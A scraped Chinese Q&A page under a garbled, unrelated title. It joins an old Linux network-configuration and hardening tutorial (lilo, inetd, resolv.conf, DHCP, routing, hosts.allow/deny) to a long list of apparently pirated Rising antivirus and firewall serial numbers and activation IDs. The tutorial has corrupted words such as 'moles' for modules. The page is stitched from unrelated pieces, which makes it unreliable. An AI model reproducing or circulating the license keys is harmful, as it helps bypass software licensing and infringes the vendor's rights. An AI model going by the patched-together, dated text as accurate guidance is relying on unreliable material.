当前位置:首页 » 云服务器 » atu0026t服务器地址

atu0026t服务器地址

发布时间: 2022-06-29 04:02:44

linux中的网络配置。。

一.安装和配置网络设备

在安装linux时,如果你有网卡,安装程序将会提示你给出tcp/ip网络的配置参数,如本机的 ip地址,缺省网关的ip地址,DNS的ip地址等等.根据这些配置参数,安装程序将会自动把网卡(linux系统首先要支持)驱动程序编译到内核中去.但是我们一定要了解加载网卡驱动程序的过程,那么在以后改变网卡,使用多个网卡的时候我们就会很容易的操作.网卡的驱动程序是作为模块加载到内核中去的,所有linux支持的网卡驱动程序都是存放在目录/lib/moles/(linux版本号)/net/ ,例如inter的82559系列10/100M自适应的引导网卡的驱动程序是eepro100.o,3COM的3C509 ISA网卡的驱动程序是3C509.o,DLINK的pci 10网卡的驱动程序是via-rhine.o,NE2000兼容性网卡的驱动程序是ne2k-pci.o和ne.o.在了解了这些基本的驱动程序之后,我们就可以通过修改模块配置文件来更换网卡或者增加网卡.

1. 修改/etc/conf.moles 文件

这个配置文件是加载模块的重要参数文件,大家先看一个范例文件

#/etc/conf.moles

alias eth0 eepro100

alias eth1 eepro100

这个文件是一个装有两块inter 82559系列网卡的linux系统中的conf.moles中的内容.alias命令表明以太口(如eth0)所具有的驱动程序的名称,alias eth0 eepro100说明在零号以太网口所要加载的驱动程序是eepro100.o.那么在使用命令 modprobe eth0的时候,系统将自动将eepro100.o加载到内核中.对于pci的网卡来说,由于系统会自动找到网卡的io地址和中断号,所以没有必要在conf.moles中使用选项options来指定网卡的io地址和中断号.但是对应于ISA网卡,则必须要在conf.moles中指定硬件的io地址或中断号, 如下所示,表明了一块NE的ISA网卡的conf.moles文件.

alias eth0 ne

options ne io=0x300 irq=5

在修改完conf.moles文件之后,就可以使用命令来加载模块,例如要插入inter的第二块网卡:

#insmod /lib/moles/2.2.14/net/eepro100.o

这样就可以在以太口加载模块eepro100.o.同时,还可以使用命令来查看当前加载的模块信息:

[root@ice /etc]# lsmod

Mole Size Used by

eepro100 15652 2 (autoclean)

返回结果的含义是当前加载的模块是eepro100,大小是15652个字节,使用者两个,方式是自动清除.

2. 修改/etc/lilo.conf文件

在一些比较新的linux版本中,由于操作系统自动检测所有相关的硬件,所以此时不必修改/etc/lilo.conf文件.但是对于ISA网卡和老的版本,为了在系统初始化中对新加的网卡进行初始化,可以修改lilo.conf文件.在/etc/lilo.conf文件中增加如下命令:

append="ether=5,0x240,eth0 ether=7,0x300,eth1"

这条命令的含义是eth0的io地址是0x240,中断是5,eth1的io地址是0x300,中断是7.

实际上,这条语句来自在系统引导影像文件时传递的参数,

LILO: linux ether=5,0x240,eth0 ether=7,0x300,eth1

这种方法也同样能够使linux系统配置好两个网卡.类似的,在使用三个以上网卡的时候,也可以依照同样的方法.

在配置好网卡之后,就应该配置TCP/IP的参数,在一般情况下,在安装linux系统的同时就会提示你配置网络参数.但是之后如果我们想要修改网络设置,可以使用如下的命令:

#ifconfig eth0 A.B.C.D netmask E.F.G.H

A.B.C.D 是eth0的IP地址,E.F.G.H是网络掩码.

其实,在linux系统中我们可以给一块网卡设置多个ip地址,例如下面的命令:

#ifconfig eth0:1 202.112.11.218 netmask 255.255.255.192

然后,使用命令#ifconfig -a 就可以看到所有的网络接口的界面:

eth0 Link encap:Ethernet HWaddr 00:90:27:58:AF:1A
inet addr:202.112.13.204 Bcast:202.112.13.255 Mask:255.255.255.192
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:435510 errors:0 dropped:0 overruns:0 frame:2
TX packets:538988 errors:0 dropped:0 overruns:0 carrier:0
collisions:318683 txqueuelen:100
Interrupt:10 Base address:0xc000

eth0:1 Link encap:Ethernet HWaddr 00:90:27:58:AF:1A
inet addr:202.112.11.218 Bcast:202.112.11.255 Mask:255.255.255.192
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
Interrupt:10 Base address:0xc000

lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
UP LOOPBACK RUNNING MTU:3924 Metric:1
RX packets:2055 errors:0 dropped:0 overruns:0 frame:0
TX packets:2055 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0

我们看到网络接口有三个,eth0 , eth0:1,lo,eth0是真实的以太网络接口,eth0:1和eth0是同一块网卡,只不过绑定了另外的一个地址,lo是会送地址。eth0和eth0:1可以使用不同网段的ip地址,这在同一个物理网段却使用不同的网络地址的时候十分有用。

另外,网卡有一种模式是混杂模式(prosimc),在这个模式下,网卡将会接收网络中所有的数据包,一些linux下的网络监听工具例如tcpmp,snort等等都是把网卡设置为混杂模式.

ifconfig命令可以在本次运行的时间内改变网卡的ip地址,但是如果系统重新启动,linux仍然按照原来的默认的设置启动网络接口。这时候,可以使用netconfig或netconf命令来重新设置默认网络参数。netconfig 命令是重新配置基本的tcp/ip参数,参数包括是否配置为动态获得ip地址(dhcpd和bootp),网卡的ip地址,网络掩码,缺省网关和首选的域名服务器地址。netconf命令可以详细的配置所有网络的参数,分为客户端任务,服务器端任务和其他的配置三个部分,在客户端的配置中,主要包括基本主机的配置(主机名,有效域名,网络别名,对应相应网卡的ip地址,网络掩码,网络设备名,网络设备的内核驱动程序),DNS地址配置,缺省网关的地址配置,NIS地址配置,ipx接口配置,ppp/slip的配置等等。在服务器端配置中,主要包括NFS的配置,DNS的配置,ApacheWebServer配置,Samba的配置和Wu-ftpd的配置。在其他的配置选项中,一个是关于/etc/hosts文件中的主机配置,一个是关于/etc/networks文件中的网络配置信息,最后是关于使用linuxconf配置的信息。

在linuxconf命令下,同样也可以配置网络信息,但是大家可以发现,linuxconf程序是调用netconf来进行网络配置的。

另外,在/etc/sysconfig/network-scripts目录下存放着系统关于网络的配置文件,范例如下:

:<br><br>
ifcfg-eth0* ifdown-post* ifup-aliases* ifup-ppp*
ifcfg-eth1* ifdown-ppp* ifup-ipx* ifup-routes*
ifcfg-lo* ifdown-sl* ifup-plip* ifup-sl*
ifdown@ ifup@ ifup-post* network-functions

ifcfg-eth0是以太口eth0的配置信息,它的内容如下:

DEVICE="eth0" /*指明网络设备名称*/
IPADDR="202.112.13.204" /*指明网络设备的ip地址*/
NETMASK="255.255.255.192" /*指明网络掩码*/
NETWORK=202.112.13.192 /*指明网络地址*/
BROADCAST=202.112.13.255 /*指明广播地址*/
ONBOOT="yes" /*指明在系统启动时是否激活网卡*/
BOOTPROTO="none" /*指明是否使用bootp协议*/

所以,我们也可以修改这个文件来进行linux下网络参数的改变。[/SIZE]

--------------------------------------------------------------------------------

二 网络服务的配置

在这一部分,我们并不是详细的介绍具体的网络服务器(DNS,FTP,WWW,SENDMAIL)的配置(那将是巨大的篇幅),而是介绍一下与linux网络服务的配置相关的文件.

1. LILO的配置文件

在linux系统中,有一个系统引导程序,那就是lilo(linux loadin),利用lilo可以实现多操作系统的选择启动.它的配置文件是/etc/lilo.conf.在这个配置文件中,lilo的配置参数主要分为两个部分,一个是全局配置参数,包括设置启动设备等等.另一个是局部配置参数,包括每个引导影像文件的配置参数.在这里我就不详细介绍每个参数,特别的仅仅说明两个重要的参数:password和restricted选项,password选项为每个引导的影像文件加入口令保护.

我们都知道,在linux系统中有一个运行模式是单用户模式,在这个模式下,用户是以超级用户的身份登录到linux系统中.人们可以通过在lilo引导的时候加入参数(linux single 或linux init 0)就可以不需要口令直接进入单用户模式的超级用户环境中,这将是十分危险的.所以在lilo.conf中增加了password的配置选项来为每个影像文件增加口令保护.

你可以在全局模式中使用password选项(对所有影像文件都加入相同的口令),或者为每个单独的影像文件加入口令.这样一来,在每次系统启动时,都会要求用户输入口令.也许你觉得每次都要输入口令很麻烦,可以使用restricted选项,它可以使lilo仅仅在linux启动时输入了参数(例如 linux single)的时候才会检验密码.这两个选项可以极大的增加系统的安全性,建议在lilo.conf文件中设置它们.

由于password在/etc/lilo.conf文件是以明文存放的,所以必须要将/etc/lilo.conf文件的属性改为仅仅root可读(0400).

另外,在lilo的早期版本中,存在着引导扇区必须存放到前1024柱面的限制,在lilo的2.51版本中已经突破了这个限制,同时引导界面也变成了图形界面更加直观.将最新版本下载解压后,使用命令make" 后,使用命令make install即可完成安装.注意: 物理安全才是最基本的安全,即使在lilo.conf中增加了口令保护,如果没有物理安全,恶意闯入者可以使用启动软盘启动linux系统.

2. 域名服务的配置文件

(1)/etc/HOSTNAME 在这个文件中保存着linux系统的主机名和域名.范例文件

ice.xanet.e.cn

这个文件表明了主机名ice,域名是xanet.e.cn

(2)/etc/hosts和/etc/networks文件 在域名服务系统中,有着主机表机制,/etc/hosts和/etc/networks就是主机表发展而来在/etc/hosts中存放着你不需要DNS系统查询而得的主机ip地址和主机名的对应,下面是一个范例文件:

# ip 地址 主机名 别名

127.0.0.1 localhosts loopback

202.117.1.13 www.xjtu.e.cn www

202.117.1.24 ftp.xjtu.e.cn ftp

在/etc/networks 中,存放着网络ip地址和网络名称的一一对应.它的文件格式和/etc/hosts是类似的

(3)/etc/resolv.conf 这个文件是DNS域名解析器的主要配置文件,它的格式十分简单,每一行由一个主关键字组成./etc/resolv.conf的关键字主要有:

domain 指明缺省的本地域名,
search 指明了一系列查找主机名的时候搜索的域名列表,
nameserver 指明了在进行域名解析时域名服务器的ip地址.下面给出一个范例文件:
#/etc/resolv.conf
domain xjtu.e.cn
search xjtu.e.cn e.cn
nameserver 202.117.0.20
nameserver 202.117.1.9

(4)/etc/host.conf 在系统中同时存在着DNS域名解析和/etc/hosts的主机表机制时,由文件/etc/host.conf来说明了解析器的查询顺序.范例文件如下:

#/etc/host.conf

order hosts,bind #解析器查询顺序是文件/etc/hosts,然后是DNS
multi on #允许主机拥有多个ip地址
nospoof on #禁止ip地址欺骗

3. DHCP的配置文件
/etc/dhcpd.conf是DHCPD的配置文件,我们可以通过在/etc/dhcpd.conf文件中的配置来实现在局域网中动态分配ip地址,一台linux主机设置为dhcpd服务器,通过鉴别网卡的MAC地址来动态的分配ip地址.范例文件如下:

option domain-name "chinapub.com";
use-host-decl-names off;
subnet 210.27.48.0 netmask 255.255.255.192
{
filename "/tmp/image";
host dial_server
{
hardware ethernet 00:02:b3:11:f2:30;
fixed-address 210.27.48.8;
filename "/tmp/image";
}
}
在这个文件中,最主要的是通过设置的硬件地址来鉴别局域网中的主机,并分配给它指定的ip地址,hardware ethernet 00:02:b3:11:f2:30指定要动态分配ip的主机得网卡的MAC地址,fixed-address 210.27.48.8指定分配其ip地址。filename "/tmp/image"是通过tftp服务,主机所要得到的影像文件,可以通过得到的影像文件来引导主机启动。

4. 超级守候进程inetd的配置

在linux系统中有一个超级守候进程inetd,inetd监听由文件/etc/services指定的服务的端口,inetd根据网络连接请求,调用相应的服务进程来相应请求.在这里有两个文件十分重要,/etc/inetd.conf和/etc/services,文件/etc/services定义linu系统中所有服务的名称,协议类型,服务的端口等等信息,/etc/inetd.conf是inetd的配置文件,由它来指定那些服务可以由inetd来监听,以及相应的服务进程的调用命令.首先介绍一下/etc/services文件,/etc/services文件是一个服务名和服务端口对应的数据库文件,如下面所示:/etc/services文件

(实际上,以上仅仅是/etc/services的一部分,限于篇幅没有全部写出)

在这个文件中,为了安全考虑,我们可以修改一些常用服务的端口地址,例如我们可以把telnet服务的端口地址改为52323,www的端口改为8080,ftp端口地址改为2121等等,这样仅仅需要在应用程序中修改相应的端口即可.这样可以提高系统的安全性.

/etc/inetd.conf文件是inetd的配置文件, 首先要了解一下linux服务器到底要提供哪些服务。一个很好的原则是" 禁止所有不需要的服务",这样黑客就少了一些攻击系统的机会./etc/inetd.conf范例文件

大家看到的这个文件已经修改过的文件,除了telnet 和ftp服务,其他所有的服务都被禁止了.在修改了/etc/inetd.conf之后,使用命令kill -HUP (inetd的进程号),使inetd重新读取配置文件并重新启动即可.

5. ip route的配置

利用linux,一台普通的微机也可以实现高性价比的路由器.首先让我们了解一下linux的查看路由信息的命令:

[root@ice /etc]# route -n
Kernel IP routing table
Destination Gateway Genmask Flags Metric Ref Use Iface
202.112.13.204 0.0.0.0 255.255.255.255 UH 0 0 0 eth0
202.117.48.43 0.0.0.0 255.255.255.255 UH 0 0 0 eth1
202.112.13.192 202.112.13.204 255.255.255.192 UG 0 0 0 eth0
202.112.13.192 0.0.0.0 255.255.255.192 U 0 0 0 eth0
202.117.48.0 202.117.48.43 255.255.255.0 UG 0 0 0 eth1
202.117.48.0 0.0.0.0 255.255.255.0 U 0 0 0 eth1
127.0.0.0 0.0.0.0 255.0.0.0 U 0 0 0 lo
0.0.0.0 202.117.48.1 0.0.0.0 UG 0 0 0 eth1
命令netstat -r n 得到输出结果和route -n是一样的.它们操作的都是linux 内核的路由表.

命令cat /proc/net/route的输出结果是以十六进制表示的路由表.

[root@ice /etc]# cat /proc/net/route
Iface Destination Gateway Flags RefCnt Use Metric Mask
eth0 CC0D70CA 00000000 0005 0 0 0 FFFFFFF
eth1 2B3075CA 00000000 0005 0 0 0 FFFFFFF
eth0 C00D70CA CC0D70CA 0003 0 0 0 C0FFFFF
eth0 C00D70CA 00000000 0001 0 0 0 C0FFFFF
eth1 003075CA 2B3075CA 0003 0 0 0 00FFFFF
eth1 003075CA 00000000 0001 0 0 0 00FFFFF
lo 0000007F 00000000 0001 0 0 0 000000F
eth1 00000000 013075CA 0003 0 0 0 0000000
通过计算可以知道,下面的这个路由表(十六进制)和前面的路由表(十进制)是一致的.

我们还可以通过命令route add (del )来操作路由表,增加和删除路由信息.

除了上面的静态路由,linux还可以通过routed来实现rip协议的动态路由.我们只需要打开linux的路由转发功能,在/proc/sys/net/ipv4/ip_forward文件中增加一个字符1.

三.网络的安全设置
在这一部分,再次强调一定要修改/etc/inetd.conf,安全的策略是禁止所有不需要的服务.除此之外,还有以下几个文件和网络安全相关.

(1)./etc/ftpusers ftp服务是一个不太安全的服务,所以/etc/ftpusers限定了不允许通过ftp访问linux主机的用户列表.当一个ftp请求传送到ftpd,ftpd首先检查用户名,如果用户名在/etc/ftpusers中,则ftpd将不会允许该用户继续连接.范例文件如下:

# /etc/ftpusers - users not allowed to login via ftp
root
bin
daemon
adm
lp
sync
shutdown
halt
mail
news
uucp
operator
games
nobody
nadmin

(2)/etc/securetty 在linux系统中,总共有六个终端控制台,我们可以在/etc/securetty中设置哪个终端允许root登录,所有其他没有写入文件中的终端都不允许root登录.范例文件如下:

# /etc/securetty - tty's on which root is allowed to login
tty1
tty2
tty3
tty4
(3)tcpd的控制登录文件/etc/hosts.allow和/etc/hosts.deny

在tcpd服务进程中,通过在/etc/hosts.allow和/etc/hosts.deny中的访问控制规则来控制外部对linux主机的访问.它们的格式都是

service-list : hosts-list [ : command]

服务进程的名称 : 主机列表 可选,当规则满足时的操作

在主机表中可以使用域名或ip地址,ALL表示匹配所有项,EXCEPT表示除了某些项, PARANOID表示当ip地址和域名不匹配时(域名伪装)匹配该项.

范例文件如下:

#
# hosts.allow This file describes the names of the hosts which are
# allowed to use the local INET services, as decided
# by the '/usr/sbin/tcpd' server.
#
ALL : 202.112.13.0/255.255.255.0
ftpd: 202.117.13.196
in.telnetd: 202.117.48.33
ALL : 127.0.0.1
在这个文件中,网段202.112.13.0/24可以访问linux系统中所有的网络服务,主机202.117.13.196只能访问ftpd服务,主机202.117.48.33只能访问telnetd服务.本机自身可以访问所有网络服务.

在/etc/hosts.deny文件中禁止所有其他情况:

#/etc/hosts.deny

ALL : DENY : spawn (/usr/bin/finger -lp @%h | /bin/mail -s "Port Denial noted in %d-%h" root)

在/etc/hosts.allow中,定义了在所有其他情况下,linux所应该执行的操作.spawn选项允许linux系统在匹配规则中执行指定的shell命令,在我们的例子中,linux系统在发现无授权的访问时,将会发送给超级用户一封主题是"Port Denial noted in %d-%h"的邮件,在这里,我们先要介绍一下allow和deny文件中的变量扩展.

(4)/etc/issue和/etc/issue.net

在我们登录linux系统中的时候,我们常常可以看到我们linux系统的版本号等敏感信息.在如今的网络攻击行为中,许多黑客首先要收集目标系统的信息,版本号等就是十分重要的信息,所以在linux系统中一般要把这些信息隐藏起来./etc/issue和/etc/issue.net就是存放这些信息的文件.我们可以修改这些文件来隐藏版本信息.

另外,在每次linux重新启动的时候,都会在脚本/etc/rc.d/rc.local中再次覆盖上面那两个文件./etc/rc.d/rc.local文件的范例如下:

# This script will be executed *after* all the other init scripts.
# You can put your own initialization stuff in here if you don't
# want to do the full Sys V style init stuff.
if [ -f /etc/redhat-release ]; then
R=$(cat /etc/redhat-release)
arch=$(uname -m)
a="a"
case "_$arch" in
_a*) a="an";;
_i*) a="an";;
esac
NUMPROC=`egrep -c "^cpu[0-9]+" /proc/stat`
if [ "$NUMPROC" -gt "1" ]; then
SMP="$NUMPROC-processor "
if [ "$NUMPROC" = "8" -o "$NUMPROC" = "11" ]; then
a="an"
else
a="a"
fi
fi
# This will overwrite /etc/issue at every boot. So, make any changes you
# want to make to /etc/issue here or you will lose them when you reboot.
#echo "" > /etc/issue
#echo "$R" >> /etc/issue
# echo "Kernel $(uname -r) on $a $SMP$(uname -m)" >> /etc/issue
cp -f /etc/issue /etc/issue.net
echo >> /etc/issue
在文件中黑体的部分就是得到系统版本信息的地方.一定要将他们注释掉.

(5)其他配置

在普通微机中,都可以通过ctl+alt+del三键的组合来重新启动linux.这样是十分不安全的,所以要在/etc/inittab文件中注释该功能:

# Trap CTRL-ALT-DELETE

#ca::ctrlaltdel:/sbin/shutdown -t3 -r now

Ⅱ 求瑞星的序列号和IP地址

2007年07月04日 星期三 下午 04:01瑞星序列号 最新瑞星ID号 2007最新瑞星杀毒序列号

产品序列号ANFUHD-2GSVKB-8L5BS7-WND200 用户ID: W5B2AT4DWEU9
BFPU69-IRV6HI-CMG1RQ-F2D200 ID:W2LDSHHHM4G5 。
推荐你使用下面这个100%可以用:
CWBW79-B6RV1R-AQLJ53-DQD200 (ID任意是8位的)
瑞星杀毒软件2006版 T1BULQ-70AWDE-9P90SF-7TD200 用户安装ID:RB2NA22T
瑞星杀毒软件2006版 SDDJ45-MSBCQ1-DMJPSA-GN5200 用户安装ID:RCVUKEGX
瑞星杀毒瑞星杀毒软件序列号和ID号软件2006版 52LDJG-Q9LBCT-6ACQL2-R35200 用户安装ID: RCVUKEGX
瑞星杀毒软件2006版 V5V0WL-NGFHWU-DT2VRM-N45200 用户安装ID:W15CV5M3GF6Q
瑞星杀毒软件2006版 RIUEKR-EKNBL6-JLE9S0-9QD200 用户安装ID:5AZHHTBBAB48
瑞星杀毒软件2006版 {VUSBRC-FMES6J-3UIFS6-PT5200}
{TV3MI2-N6GTCG-LQL8S5-7L5200} 升级ID: 4AJRY64DNA4G
{52LDJG-Q9LBCT-6ACQS2-R35200}
(推荐你使用下面这个)
产品序列号:G13T87-T18VR1-W098SA-IKD200 ID:任意(随便输入就可以了)
瑞星个人防火墙下载版序号:
9G9V0Q-A92E86-AJCTRN-9RD200升级ID:RCX89JYL
36RDFV-PQMJ3W-M65EGV-RN4200升级ID:TAZH7S1E
TJ1A8E-F4PAI3-JQBGSA-BKD200升级ID:5AKRZATXWC4F

可在线升级的瑞星序列号(供参考)
序列号: 52LDJG-Q9LBCT-6ACQ52-R35200 授权ID:RCHVDD9T
序列号: EWUVP3-3NWFMO-PUMFS2-PT5200 授权ID:RCHVDD9T
序列号: JUQVN2 CWEFLP J7JAC3 Q23200 授权ID:RCHVEPWV
序列号: JUQVN2 CWEFLP J7JAC3 Q23200 授权ID:RCHVEPWV
序列号: U0I26A-W84GHI-NR8KSB-SU6200 授权ID:RCRSM1SU
序列号: HW5P8T-4FQE27-13N3SQ-IT5200 授权ID:RCHVE6RN
序列号:V6LGRK-FGLDVL-3T49RL-V15200 用户安装ID:W15CF5MCFWRQ
序列号:TV3MI2-N6GTCG-LQL8S5-7L5200 用户安装ID:W1QC96MXA8L4
序列号:V5V0WL-NGFHWU-DT2VRM-N45200 用户安装ID:W15CV5M3GF6Q
序列号: 52LDJG-Q9LBCT-7ACQS2-R35200 用户安装ID:4AJRY64DNA4G
序列号: 4A7I9W-92HTIF-R8UWSM-FK5200 用户安装ID:W2PC4VRZFZ4D
序列号: W13KIE-NP8U4J-LV82S3-VH5200 用户安装ID:W15CF5MCFWRQ
序列号: TV3MI2-N6GTCG-LQL8S5-7L5200 用户安装ID:W1QC96MXA8L4
序列号: AM01HI-RKG1KC-ML15S5-UUD200 用户安装ID:W2L2CYG9QK7J
序列号: 4KS0LG-146QUC-092JRL-T8D200 用户安装ID:W2C25JCJHALB
序列号: C6441W-J0H0PF-TP1AS5-45D200 用户安装ID:W2G2YY7T33PF
序列号: A7GMKR-2GT4D6-GK24S8-9GD200 用户安装ID:W2C2KYEMJ3UX
序列号: AC9G7K-2I2DQU-0KLHRN-J2D200 用户安装ID:W2428YEFRACH
序列号: ACKWII-AI564K-IKLQRN-HWD200 用户安装ID:W2B27YE6Y13T
序列号: NKL8HB-DT5BTA-SF69RH-WUD200 用户安装ID:W22D3EJGK5Z3
序列号: NKNJP5-LT5U61-DF6CRL-PMD200 用户安装ID:W2ZDMEJQKXIA
序列号: W1EB04-FQBJ01-3V8FSB-PG5200 用户安装ID:W252BGJASD5R
序列号: TIW2MK-W5NQDL-7QFDRK-395200 用户安装ID:W2Z2CGJHSC2H
序列号: 54VUUH-187MNC-8A4PR2-WPD200 用户安装ID:W2T2GXEUGYI4
序列号: 3UN97B-PVDSHR-V7NURN-NAD200 用户安装ID:W2U28WW15E43
序列号: 4WW961-16WSHG-89ITRH-SRD200 用户安装ID:W2X279SDENS5
序列号: 7L2PC9-QT8NS2-EF56RR-E1D200 用户安装ID:W24DWC5BVTKT
序列号: 67QTD0-HGVES8-4C0HRG-NQD200 用户安装ID:W2ZDBC4QAXQG
序列号: 0473L2-801Q58-I07WRS-THD200 用户安装ID:W2CDFFVQMF9Z
序列号: QTT8R8-VA73VI-7JGKS3-CN5200 用户安装ID:W3SC9N1VWBWG
序列号: I60FED-4GG23J-945FS0-W55200 用户安装ID:W2WC7MYGXC9U
序列号: TCS1VM-W26QNL-NPGKRJ-VW5200 用户安装ID:W1DCD5PVTJTV
序列号: DLL220-JFD98G-4S24S4-NJ5200 用户安装ID:W4NCRP3YUGME
序列号: RLDPI3-EKBFTG-SL32S6-Q05200 用户安装ID:W2VC3WFUHAC7
序列号: VLL76J-7ND81K-QU21S2-SM5200 用户安装ID:W4YCJQZ3V8KA
序列号: 9SJ43W-IFTPPW-TJU0SN-NN5200 用户安装ID:W2F2PACJMXF3
序列号: IRTG70-CNN5QP-35WQS1-IT5200 用户安装ID:W222L13RC9CN
序列号: 4IPNFN-H5M43U-T9FHS3-EF5200 用户安装ID:W27241QXWXHL
序列号: 802VUH-210MFC-8GALRK-AM5200 用户安装ID:W2E26FFI5XTN
序列号: SC25AJ-6R0GIK-QMN6RK-QPD200 用户安装ID:W2IDCE9KXPKS
序列号: AK21HI-AK0HKC-IL56RN-TTD200 用户安装ID:W2F2T9GM5EIP
序列号: AML8U3-IKLBW8-TL48S7-8Q5200 用户安装ID:W24CD58QN7EL
序列号: RSQM3D-ENVC8S-BLU0S1-SN5200 用户安装ID:W2X23ERN1UFP
序列号: DCWU73-3A7VHP-PRGURL-UP5200 用户安装ID:W1W2N2VWAYNZ
序列号: SINM7D-MULT9S-DNF0S4-Q85200 用户安装ID:W2X2HB7H3PAN
序列号: 7TU4HQ-QV78TE-EFG3RG-U35200 用户安装ID:W28CBY6FHA22
序列号: SPWETF-6W7RF3-QNSFS6-S15200 用户安装ID:W2W2UGRKL2ER
序列号: 3QFAUA-GWBSFA-K7PVRK-225200 用户安装ID:W2T2YCPTBW1J
序列号: 92Q40U-R9M8P7-EIFUSA-PI5200 用户安装ID:W242XDDYWXH7
序列号: FJ5MT4-SQQCF1-6WA5S8-RLD200 用户安装ID:4H98RL8V3B44
序列号: S3331I-MUPQ0C-LMA9S6-CHD200 用户安装ID:4HP2FMLVNB4B
序列号: 7CET7T-HR3MQW-4EMQRB-J2D200 用户安装ID:4H77DRQC1242
序列号: 3E0D6R-0VG2HM-G6G2RK-8VD200 用户安装ID:4HBIYQX88B4B
序列号: QM99D8-M8IBJA-5J0DS7-5CD200 用户安装ID:4HB24VIY1B4U
序列号: RT6221-MM1H8G-DLM8RG-8PD200 用户安装ID:4HV7MWPC524J
序列号: LDQ5RQ-LAE8MM-DALMRG-9PD200 用户安装ID:4HDP6HPCC245

此更新了瑞星2006防火墙新序列号和ID.请网友们相互转告.
序列号:N0A81N-LQ2JPD-UEDRRG-2VD200
用户ID:F25CKRIR4XNQ

瑞星杀毒软件2006升级包以及的序列号
产品序列号:7JE9R9-QTSIEI-EFF4SB-EJ5200
产品序列号:52LDJG-Q9LBCT-6ACQX2-R38200
产品序列号:52LDJG-Q9LBCT-6ACQ52-R35400
产品序列号:52LDJG-Q9LBCT-6ACQS2-R35200
用户安装ID:4AJRY64DNA4G

产品序列号:77PUHE-QPV6KB-ME6JS3-KM5200
用户安装ID:W28CYL3L84PR
产品序列号:V6LGRK-FGLDVL-3T49RL-V15200
用户安装ID:W15CF5MCFWRQ
产品序列号:TV3MI2-N6GTCG-LQL8S5-7L5200
用户安装ID:W1QC96MXA8L4
产品序列号:V5V0WL-NGFHWU-DT2VRM-N45200
用户安装ID:W15CV5M3GF6Q
回答者:showass - 助理 三级 4-8 16:42

产品序列号ANFUHD-2GSVKB-8L5BS7-WND200 用户ID: W5B2AT4DWEU9
BFPU69-IRV6HI-CMG1RQ-F2D200 ID:W2LDSHHHM4G5 。
推荐你使用下面这个100%可以用:
CWBW79-B6RV1R-AQLJ53-DQD200 (ID任意是8位

瑞星杀毒软件2006/2007下载版序列号
SN:T1BULQ-70AWDE-9P90SF-7TD200 ID:RB2NA22T
SN:twhgm4-n2th-5qj7rm-06d200 ID:4h476397qb4p
SN:92Q40U-R9M8P7-EIFUSA-PI5200 ID:4hcph47tpb4x
SN:77PUHE-QPV6KB-ME6JS3-KM5200 ID:W15CF5MCFWRQ
SN:EK72D3-3K1QB8-PU7CRM-F1D200 ID:W2BDX2HW66TI
SN:DTRVAG-SA6MAK-6SLNRN-ASD200 ID:4HWKC868AB4X

瑞星个人防火墙2006/2007序列号
SN:T1BULQ-70AWDE-9P90SF-7TD200 ID:RB2NA22T
SN:VQ6RIK-FJ9NCL-3UV1S4-QCD200 ID:4HAHFNXT7B4C
SN:T1BULQ-70AWDE-9P90SF-7TD200 ID:RB2NA22T升级用
SN:77PUHE-QPV6KB-ME6JS3-KM5200 ID:W28CYL3L84PR
SN:9G9V0Q-A92E86-AJCTRN-9RD200 升级ID:RCX89JYL
SN:V5V0WL-NGFHWU-DT2VRM-N45200 ID:W15CV5M3GF6Q
SN:080K3M-02050U-G0PVSC-AJE200 ID:6A94GZSK6F4R

瑞星杀毒软件2007和瑞星个人防火墙2007的序列号和ID
序列号:R40G6Q-6H041M-9K7HRK-KJD200 ID:6AMQCR3MJE4X 这是2006的,但是可以升级的2007
序列号:MI0TMS-5KG75M-QDDLS0-1VE200 ID:7AHRR6LPN34G
序列号:CSA5V1-S7RJNG-EQV4S6-G8E200 ID:U2MZUAJ6QFVR
序列号:KSILHN-57TKKD-Q9VCS5-KLE200 ID:W2NDV88L88BU
序列号:4QH7A6 H6C9RH K9PSSC SUD200 ID:5ATRBGE53B4L
序列号:vusbrc-fmes6j-3uifs6-pt5200 ID:w2pc4vrzfz4d 光盘版(正版)
序列号:2R0EMP-GMG3LM-45RARH-8RD200 ID:5AI39QXQ224A 下载版(正版)
序列号:0IPVTW-P5M5F7-V1D2RM-N2E200 ID:U24ZBZ5817HA

瑞星杀毒软件网络版序列号
20服务器,60客户端 3PVQNT-5JP184-9R8IJB-1F9108
10服务器,14338客户端 WS1H3W-WUWUU9-JL1D3Q-SF9108
10服务器,100客户端 86CEWS-WR44SP-6DGDR4-DAF008
10服务器,50客户端 WS1H3W-PLWUU9-JL1D3Q-SF9108
24服务器,16736客户端 2RE9VM-WUC1QA-51MA0T-DR9108
115服务器,106客户端 P28FLA-L0VCQL-BB8NM7-HJA108
1W9EVK-05RBUL-28W1S3-HCE208

------------------------------------------------------------------------------------------------------------

瑞星杀毒软件2005序列号:RIUEKR-EKNBL6-JLE9S0-9QD200对应ID:5AZHHTBBAB48
VUSBRC-FMES6J-3UIFS6-PT5200 or 52LDJG-Q9LBCT-6ACQS2-R35200
TV3MI2-N6GTCG-LQL8S5-7L5200 升级ID: 4AJRY64DNA4G

可在线升级的瑞星序列号(供参考)

序列号:52LDJG-Q9LBCT-6ACQ52-R35200 授权ID:RCHVDD9T
序列号:EWUVP3-3NWFMO-PUMFS2-PT5200 授权ID:RCHVDD9T
序列号: JUQVN2 CWEFLP J7JAC3 Q23200 授权ID:RCHVEPWV
序列号: HW5P8T-4FQE27-13N3SQ-IT5200 授权ID:RCHVE6RN

----------------------更多瑞星2005杀毒个人版安装序列号------------------

SN:TLHJP5-N4CD61-DQ7GRP-AMD200 ID:W2R2Q8T9LN2C
SN:NNRJ4Q-UTVL16-FF60S5-UJ5200 ID:任意
W13KIE-NP8U4J-LV82S3-VH9400 QTT8R8-VA73VI-7JGKS3-CN5200
IRTG70-CNN5QP-35WQS1-IT5200 U0I26A-W84GHI-NR8KSB-SU9300
U0I26A-W84GHI-NR8KSB-SU4900 W13KIE-NP8U4J-LV82S3-VH1990
W13KIE-NP8U4J-LV82S3-VH5200 77PUHE-QPV6KB-ME6JS3-KM5200
U0I26A-W84GHI-NR8KSB-SU4300 HNTQPT-4AWW67-13718L-HC4200
W13KIE-NP8U4J-LV82S3-VH6500 W13KIE-NP8U4J-LV82S3-VH1194
U0I26A-W84GHI-NR8KSB-SU2800 JUQVN2-CWEFLP-J7JAC3-Q232O0
W13KIE-NP8U4J-LV82S3-VH1199 W13KIE-NP8U4J-LV82S3-VH9500
U0I26A-W84GHI-NR8KSB-SU3800 U0I26A-W84GHI-NR8KSB-SU9400
